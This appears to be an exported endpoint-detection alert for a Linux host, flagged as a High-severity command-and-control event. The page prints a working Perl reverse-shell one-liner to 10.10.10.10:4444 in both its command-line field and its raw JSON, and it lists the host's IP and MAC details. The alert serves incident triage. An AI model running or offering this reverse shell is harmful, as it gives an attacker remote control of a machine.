Alert Information
High
- Alert ID
ind:f04562e41eb24f95911339a2dfa4d617:1766234830420225678-30103-3855632- Composite ID
84393bf974fd44bda943a25a6a7bc27f:ind:f04562e41eb24f95911339a2dfa4d617:1766234830420225678-30103-3855632- 설명
- Bash has created an interactive terminal for a remote host. Check the process tree to determine if malicious commands were executed and if this access was expected.
- 호스트
- inbridge-40
- 상태
- new
- 생성 시간
- 2025-12-20 21:48:11
- 업데이트 시간
- 2025-12-20 22:47:11
MITRE ATT&CK
- Tactic
- Command and Control
- Technique
- Remote Access Tools
Command Line
bash -c perl -e "use Socket;\$i=\"10.10.10.10\";\$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");}"
Raw JSON Data
{"id":"ind:f04562e41eb24f95911339a2dfa4d617:1766234830420225678-30103-3855632","composite_id":"84393bf974fd44bda943a25a6a7bc27f:ind:f04562e41eb24f95911339a2dfa4d617:1766234830420225678-30103-3855632","agent_id":"f04562e41eb24f95911339a2dfa4d617","cid":"84393bf974fd44bda943a25a6a7bc27f","description":"Bash has created an interactive terminal for a remote host. Check the process tree to determine if malicious commands were executed and if this access was expected.","severity":70,"severity_name":"High","confidence":80,"tactic":"Command and Control","tactic_id":"TA0011","technique":"Remote Access Tools","technique_id":"T1219","cmdline":"bash -c perl -e \u0022use Socket;\\$i=\\\u002210.10.10.10\\\u0022;\\$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\\\u0022tcp\\\u0022));if(connect(S,sockaddr_in(\\$p,inet_aton(\\$i)))){open(STDIN,\\\u0022\u003E\u0026S\\\u0022);open(STDOUT,\\\u0022\u003E\u0026S\\\u0022);open(STDERR,\\\u0022\u003E\u0026S\\\u0022);exec(\\\u0022/bin/sh -i\\\u0022);}\u0022","filename":"bash","filepath":"/usr/bin/bash","sha256":"bc5945feb8bd26203ebfafea5ce1878bb2e32cb8fb50ab7ae395cfb1e1aaaef1","status":"new","type":"ldt","created_timestamp":"2025-12-20T12:48:11.996084881Z","updated_timestamp":"2025-12-20T13:47:11.97505224Z","device":{"device_id":"f04562e41eb24f95911339a2dfa4d617","cid":"84393bf974fd44bda943a25a6a7bc27f","agent_version":"7.31.18410.0","hostname":"inbridge-40","local_ip":"10.24.11.214","external_ip":"211.198.135.5","mac_address":"00-0c-29-31-3f-de","platform_name":"Linux","os_version":"Ubuntu 24.04"},"aggregate_id":"aggind:f04562e41eb24f95911339a2dfa4d617:12914718133","CreatedAt":"2025-12-20T21:48:11.9960849+09:00","UpdatedAt":"2025-12-20T22:47:11.9750522+09:00"}
Quick Info
- Severity High
- Score 70
-
Agent ID
f04562e41eb24f95911339a2dfa4d617
Actions